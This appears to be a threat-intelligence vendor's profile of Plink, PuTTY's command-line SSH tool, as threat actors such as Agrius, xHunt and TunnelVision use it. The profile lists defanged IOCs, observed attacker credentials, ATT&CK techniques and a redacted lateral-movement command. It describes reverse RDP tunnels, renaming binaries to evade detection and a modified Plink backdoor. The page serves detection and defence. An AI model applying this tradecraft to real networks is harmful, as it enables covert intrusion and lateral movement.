Plink
Plink is the command-line connection utility from PuTTY that threat actors repeatedly use as a dual-use SSH tunneling tool rather than bespoke malware. Across the provided reporting, it is used to establish SSH tunnels and reverse tunnels, most commonly to expose or reach internal RDP services, but also to access internal HTTP/IIS services and transfer tools. Observed use cases include tunneling RDP for remote access and lateral movement, creating dedicated conduits into segmented networks, and enabling encrypted SSH-based movement throughout victim environments.
The content links Plink use to multiple threat actors and campaigns. Agrius used Plink to tunnel RDP connections for remote access and lateral movement and in some cases renamed it to systems.exe. In xHunt intrusions at Kuwaiti organizations, operators used the BumbleBee ASPX web shell to execute commands and deploy PuTTY Link (Plink), sometimes renamed RTQ.exe, to create SSH tunnels to internal systems over RDP (TCP 3389) and HTTP (TCP 80); one observed tunnel used external IP 192.119.110[.]194 with credentials bor / 123321, and related infrastructure included 142.11.211[.]79, 91.92.109[.]59, 192.255.166[.]158, backendloop[.]online, bestmg[.]info, windowsmicrosofte[.]online, ns1.backendloop[.]online, and ns2.backendloop[.]online. TEMP.Veles used encrypted SSH-based PLINK tunnels during the C0032 campaign to transfer tools and enable RDP connections throughout the environment. SentinelLabs reported the Iranian-aligned TunnelVision cluster commonly deployed FRPC and Plink, including downloading and executing Plink to tunnel RDP traffic after exploiting VMware Horizon Log4j vulnerabilities. Microsoft also reported Seashell Blizzard / Sandworm-linked activity deploying tunneling utilities such as Chisel, Plink, and rsockstun, including via the LocalOlive web shell.
The content also describes a modified Plink-based backdoor. The file napupdatedb.exe (MD5: BA51F25DB03A66C658D1FD4396F32843) is identified as a modified PLINK/PuTTY executable that initiates an SSH reverse tunnel with embedded credentials from local port 3389 to an attacker-controlled server over TCP 8531. Its embedded configuration stores a semicolon-separated list of Plink command-line arguments containing C2 servers and credentials, and replaces the "*" character in each C2 domain with the infected system’s six-digit local time. In other reporting, actors used renamed Plink binaries such as RTQ.exe and systems.exe for defense evasion.
Victim environments and sectors mentioned in connection with Plink-enabled operations include Kuwaiti organizations, Albanian organizations, Ukrainian entities, and broader targeting of government, telecommunications, energy, oil and gas, shipping, arms manufacturing, and other enterprise networks depending on the actor. Plink itself is not described as self-propagating or inherently persistent in the provided content; its role is as an SSH tunneling utility leveraged by threat actors and, in some cases, modified or renamed to function as a backdoor or covert access mechanism.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.
...deploying tunneling utilities such as Chisel, plink, and rsockstun to established dedicated conduits into affected network segments.
The commands executed on the servers via BumbleBee suggest that the actor used the PuTTY Link (Plink) tool to create SSH tunnels to access services internal to the compromised network.
"The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink."
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
2 techniquesThe threat actors exploited the ProxyShell and Log4j vulnerabilities to deploy TunnelFish, a custom Fast Reverse Proxy client (FRPC) variant and enable remote access to vulnerable systems.
"we have observed wide exploitation of ... Microsoft Exchange (ProxyShell)" | "we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379)" | "we have observed wide exploitation of ... recently Log4Shell... focusing around exploitation of VMware Horizon Log4j vulnerabilities."
Execution
1 techniqueThe commands show the actor: Laterally moving... by mounting a shared folder, copying Plink (RTQ.exe) to a remote system and using Windows Management Instrumentation (WMI) (T1047) to create an SSH tunnel for RDP access.
Persistence
1 techniqueStealth
2 techniques"Review your artifacts of execution for 'plink.exe' file execution. Note that attackers can rename the file name to avoid detection."
The commands show the actor: Removing evidence of their presence by deleting (T1070.004) BumbleBee after they were done issuing commands.
Lateral Movement
5 techniques"The threat actor used RDP with valid account credentials for lateral movement..."
We observed the actor using Plink to create an SSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote Desktop Protocol (RDP).
15:49:30 net use \\<redacted IP #3>\C$ /user:<redacted domain>\<redacted username #2> <redacted password #1> T1021.002
The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive.
The commands show the actor: Laterally moving (T1570) to another system by mounting a shared folder, copying Plink (RTQ.exe) to a remote system...
Command and Control
6 techniques“Sliver… penetration testing framework. Chisel… creates a TCP/UDP tunnel… over HTTP… secured via SSH… FastReverseProxy (FRP)… to expose local servers to the public internet.”
Agrius used the Plink tool to tunnel RDP connections for remote access and lateral movement in victim environments.
Several entries mention use of proxy and tunneling tools including PLINK, Venom proxy, GOST reverse proxy, Ligolo, Cloudflared, rsocx reverse proxy, Iox proxy tool, NPS tunneling tool, and AirVPN.
FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure. REPTILE can use TLS over raw TCP for secure C2.
"attempted to download ngrok" and "Download and execution of tunneling tools, including Plink and Ngrok"; also mentions transfer.sh, ufile.io, raw.githubusercontent.com.
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure.
Recent activity
13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Command-line network connection tool often used for tunneling and remote access.
SSH/tunneling utility used to create access conduits into compromised network segments.
Command-line SSH client (PuTTY suite) used for scripted remote connections and tunneling.
Publicly available network communication utility used by the attackers as part of the intrusion toolset.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.